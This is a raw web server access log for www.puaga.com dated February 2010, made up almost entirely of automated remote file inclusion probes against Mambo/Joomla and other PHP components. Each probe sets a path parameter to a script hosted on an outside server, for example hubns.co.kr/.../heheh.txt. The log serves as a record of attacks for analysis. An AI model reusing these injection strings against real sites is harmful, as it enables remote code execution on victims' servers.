74.50.85.229 - - [12/Feb/2010:07:47:33 -0800] "GET /logs/access_100115.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:47:47 -0800] "GET /logs/access_100116.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:48:46 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:48:46 -0800] "GET /logs/access_100129.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:48:46 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:20 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:20 -0800] "GET /logs/access_100111.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:20 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:32 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:34 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:34 -0800] "GET /logs/access_100111.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:34 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:07:50:53 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:07:51:01 -0800] "GET /logs/access_100124.log/errors.php?error=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:51:01 -0800] "GET /logs/access_100111.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:51:01 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:51:01 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:51:02 -0800] "GET /logs/access_100129.log///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:51:13 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:51:14 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:51:20 -0800] "GET /logs/access_100115.log///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:51:47 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:51:47 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:51:47 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:51:47 -0800] "GET /logs/access_100123.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:52:21 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:52:21 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:52:22 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:52:46 -0800] "GET /logs/access_100103.log%20%20/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:53:04 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:53:04 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:53:04 -0800] "GET /logs/access_100111.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:07:53:13 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:53:22 -0800] "GET /logs/access.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:53:37 -0800] "GET /logs/access_100203.log%20%20//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:53:37 -0800] "GET /bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:53:37 -0800] "GET /logs//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:53:54 -0800] "GET /logs/access_090521.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:53:54 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_090521.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:53:59 -0800] "GET /logs/access_100121.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:15 -0800] "GET /home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:15 -0800] "GET /logs/access_100119.log%20%20/home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:15 -0800] "GET /logs/home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:24 -0800] "GET /home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:24 -0800] "GET /logs/access_100119.log%20%20/home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:25 -0800] "GET /logs/home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:30 -0800] "GET /home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:30 -0800] "GET /logs/access_100119.log%20%20/home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:54:31 -0800] "GET /logs/home.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:54:31 -0800] "GET /logs/access_100121.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [12/Feb/2010:07:55:00 -0800] "GET /htmltonuke.php?filnavn=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:07:55:09 -0800] "GET /logs/access_100107.log%20%20/?path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:56:47 -0800] "GET /logs/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:56:48 -0800] "GET /port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:56:48 -0800] "GET /logs/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:56:48 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:56:50 -0800] "GET /logs/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:56:50 -0800] "GET /port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:57:15 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:57:15 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:57:15 -0800] "GET /?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:57:24 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:57:27 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:57:28 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:57:29 -0800] "GET /?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:57:35 -0800] "GET /logs/access_100112.log%20%20/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:57:43 -0800] "GET /logs/access_100112.log%20%20/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:57:46 -0800] "GET /logs/access_100112.log%20%20/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:07:58:05 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:07:58:05 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:58:14 -0800] "GET /logs/access_100118.log/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:58:15 -0800] "GET /logs/access_100118.log/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:07:58:26 -0800] "GET /logs/access_100118.log/port.php?content=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:00:47 -0800] "GET /bbs//bad_link.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:00:47 -0800] "GET /logs//bbs//bad_link.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:00:53 -0800] "GET /logs/access_100116.log//bbs//bad_link.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:01:08 -0800] "GET /logs/access_100111.log//bbs//bad_link.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:01:09 -0800] "GET /logs/access_100111.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:01:20 -0800] "GET /logs/access_100125.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:08:01:33 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:08:01:53 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:02:58 -0800] "GET /logs//bbs//become_editor.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:02:58 -0800] "GET /logs/access_100127.log//bbs//become_editor.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:02:58 -0800] "GET /logs/access_100203.log//bbs//become_editor.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:03:03 -0800] "GET /bbs//become_editor.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:03:04 -0800] "GET /logs/access_100116.log%20%20//bbs//bad_link.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:03:19 -0800] "GET /logs/access_100107.log%20%20//plugin.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:03:19 -0800] "GET /logs//plugin.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:03:19 -0800] "GET /plugin.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:03:24 -0800] "GET /logs/access_100107.log%20%20//plugin.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:03:24 -0800] "GET /plugin.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:03:26 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:03:26 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:03:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:04:00 -0800] "GET /logs///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:04:00 -0800] "GET /logs/access_100202.log%20%20///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:04:00 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:04:26 -0800] "GET /logs/access_100111.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:04:36 -0800] "GET /logs/access_100131.log%20%20///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:04:50 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:04:50 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:04:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:05:09 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:05:10 -0800] "GET /logs///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:05:10 -0800] "GET /logs/access_100202.log%20%20///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:05:29 -0800] "GET /logs/access_100131.log%20%20///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:05:42 -0800] "GET /logs/access_100116.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:05:45 -0800] "GET /logs/access_100202.log%20%20///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:05:46 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:05:46 -0800] "GET /logs///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:06:18 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:06:18 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:06:18 -0800] "GET /logs/access_100203.log%20%20//bbs//become_editor.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:06:18 -0800] "GET /logs/access_100127.log%20%20//bbs//become_editor.php?theme_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:08:06:41 -0800] "GET /logs/access_100108.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:06:43 -0800] "GET /logs//plugin.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:06:43 -0800] "GET /logs/access_100131.log%20%20///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:08:06:44 -0800] "GET /logs/access_100107.log%20%20//plugin.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:08:06:47 -0800] "GET /logs/access_100111.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
